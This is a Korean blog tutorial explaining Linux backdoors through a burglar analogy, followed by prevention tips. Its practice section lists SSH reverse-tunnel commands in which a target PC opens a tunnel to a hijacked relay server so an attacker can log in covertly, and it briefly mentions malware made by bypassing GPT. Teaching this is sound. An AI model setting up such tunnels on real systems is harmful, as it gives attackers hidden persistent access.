백도어 실습으로 배우는 시스템 보안

백도어란 무엇인가요?

  루트킷, 칼리리눅스를 사용하지 않고 실습을 하면서 배울 주제인 백도어는 시스템에 잠복하고 사용자의 인지를 피해 은밀하게 동작하는 해킹 기술입니다. 이는 시스템에 비밀로 설치되어 사용자가 모르게 악의적인 목적을 위해 사용될 수 있습니다. 나는 공유기 아래에 있으니 안전하다? 절대 아닙니다!! 

백도어의 작동 원리

 백도어는 주로 악의적인 사용자가 시스템에 침투한 후 설치하게 됩니다. 이렇게 설치된 백도어는 주로 포트를 열어 외부에서의 접속을 허용하고, 사용자가 모르게 백도어의 기능을 실행합니다. 이는 악용될 경우 사용자의 개인 정보 유출과 시스템의 보안 위협으로 이어질 수 있습니다. 너무 복잡한 내용이 될 수도 있으니 한번 그림과 같이 설명해 보도록 할게요!

 

 

 

자 여러분은 지금 현재 집에있어요

 

 

당신이 도둑이라고 가정했을 때 집으로 들어가는 방법은 어떤 것들이 있을까요?'

 

 

지금 머릿속에 떠오르는 건...

 

1. 창문을 통해서 들어온다
2. 어떻게든 파헤쳐서 비밀번호를 알아낸다
3. 문을 두드려서 열어달라고한다
4. 부모님의 지인이라고 하면서 열어달라고한다.
5. 설치 기사인척하고 열어달라고한다

테스트도 해봐요! 재밌는 멘트는 글상단에 올릴 예정이에요! (테스트는 광고가 아닙니다!)

 

 

 

 

 

자 그럼 다시 이어서!  설명해 볼게요!

 

 

 

문도 자물쇠로 튼튼히 잠궈둔상태에요!

 

 

문도 잠겨있고, 창문도 잠겨있네요 그런데 갑자기 배달기사가 와서 문을 열어달라고 했어요! 그래서 집주인은 문을 열고 물건을 받았는데..  깜빡하고 문을 안 잠그고 열어져 있는 거예요..! 헉! 누군가 들어오면 어쩌죠?!라고 생각한 순간.. 누군가 갑자기 들어와서 문열쇠, 문 비밀번호를 복사해 갔어요!

 

이제 그 괴한은 언제든지 우리 집에 들어올 수 있게 된 거예요! 이런 게 바로 백도어라고 생각하시면 될 것 같아요

 

 

백도어 감지와 대응

리눅스에서 백도어를 찾고 제거하는 것은 시스템 보안에 있어 매우 중요한 과정입니다. 시스템 보안을 강화하고 외부로부터의 불법적인 접근시도를 차단하기 위해 방화벽(인바운드, 아웃바운드 규칙 설정, 허용앱 등록)과 같은 보안 장치를 설치하고 업데이트를 꾸준히 수행해야 합니다. 또한 사용자들은 신뢰할 수 없는 소프트웨어를 설치하지 않는 것이 중요합니다. 

특히 요즘 들어서 보안이슈가 점점 증가하는 추세인데요  GPT  우회 질문을 통해서 악성 코드들이 생겨나고 있는 실정이에요.. 그에 따른 공격방법도 다양해지고 있고요

 

단순히 이해를 위한 교육용으로  만든 방식이기 때문에 중요한 인증 절차 부분 우회 로직은 설명드리기 어려운 점 사전에 말씀드리겠습니다

 

리눅스 실습

중간 전달자 PC에서 실행

#도둑이 자신의 정체를 감추기위해서 서버하나를 납치했어요
ssh -N -R *:원격포트:localhost:ssh연결포트 도둑pc의id@도둑피씨ip -p 도둑pc의ssh portnumber

---

master pc에서 실행

#도둑pc에서 실행되어질코드
ssh -p 위에서지정한원격포트 서버에존재하는유저이름@localhost

---

타깃이 될 pc에서 실행

#집주인 집에서 열쇠를 복사해가기
ssh -N -R *:원격포트:localhost:집주인sshport 탈취된서버아이디@서버아이피 -p 서버아이피의ssh포트

---

도둑 pc에서 실행

ssh -p 집주인의원격port 집주인의id@localhost

---

백도어 예방 방법

리눅스 시스템의 백도어를 예방하기 위해서는 보안 업데이트와 패치를 정기적으로 수행하고, 악의적인 소프트웨어를 차단하는 방화벽을 설정하는 것이 필요합니다. 또한 사용자들에게 보안에 대한 인식을 높이고, 신뢰할 수 없는 소스에서 소프트웨어를 다운로드하지 않도록 주의해야 합니다. 예시로 GITHUB에 올라와있는 자료에 내부를 살펴보지도 않고 사용한다거나, 소스코드를 암호화한 파일, bat 파일, 쉘스크립트파일을 실행했다가 악성코드에 감염된 사례도 나오고 있어요!!

백도어와 보안의 중요성

리눅스 시스템은 안정성과 보안성으로 유명하며, 이를 유지하기 위해서는 백도어와 같은 보안 위협으로부터 시스템을 보호하는 것이 중요합니다. 악의적인 사용자로부터의 침해를 방지하고, 개인 정보를 안전하게 보호하기 위해 보안에 대한 지속적인 관심이 필요합니다.

종합

백도어는 시스템에 감춰진 위협으로, 사용자의 모르게 동작하여 시스템과 개인 정보를 위협할 수 있습니다. 시스템 보안을 강화하고 외부로부터의 불법적인 접근을 차단하기 위해서는 보안 업데이트와 패치를 꾸준히 수행하고, 사용자들에게 보안에 대한 인식을 높이는 것이 중요합니다. 안전한 리눅스 시스템을 유지하기 위해 보안에 대한 지속적인 관심이 필요합니다.

 

사용할수있는 명령어,재료 모음

 

2023.08.02 - [리눅스/원격제어] - 리눅스 넷켓 강력한 네트워크 제어! 소름 돋는 통신 기술 대공개(1편)

리눅스 넷켓 강력한 네트워크 제어! 소름 돋는 통신 기술 대공개(1편)

 

2023.07.16 - [리눅스/원격제어] - SSH 원격제어

 

SSH 원격제어

2023.07.19 - [리눅스/원격제어] - 포트포워딩 없이 원격제어 또는 원격제어 안될때 해결법

 

포트포워딩 없이 원격제어 또는 원격제어 안될때 해결법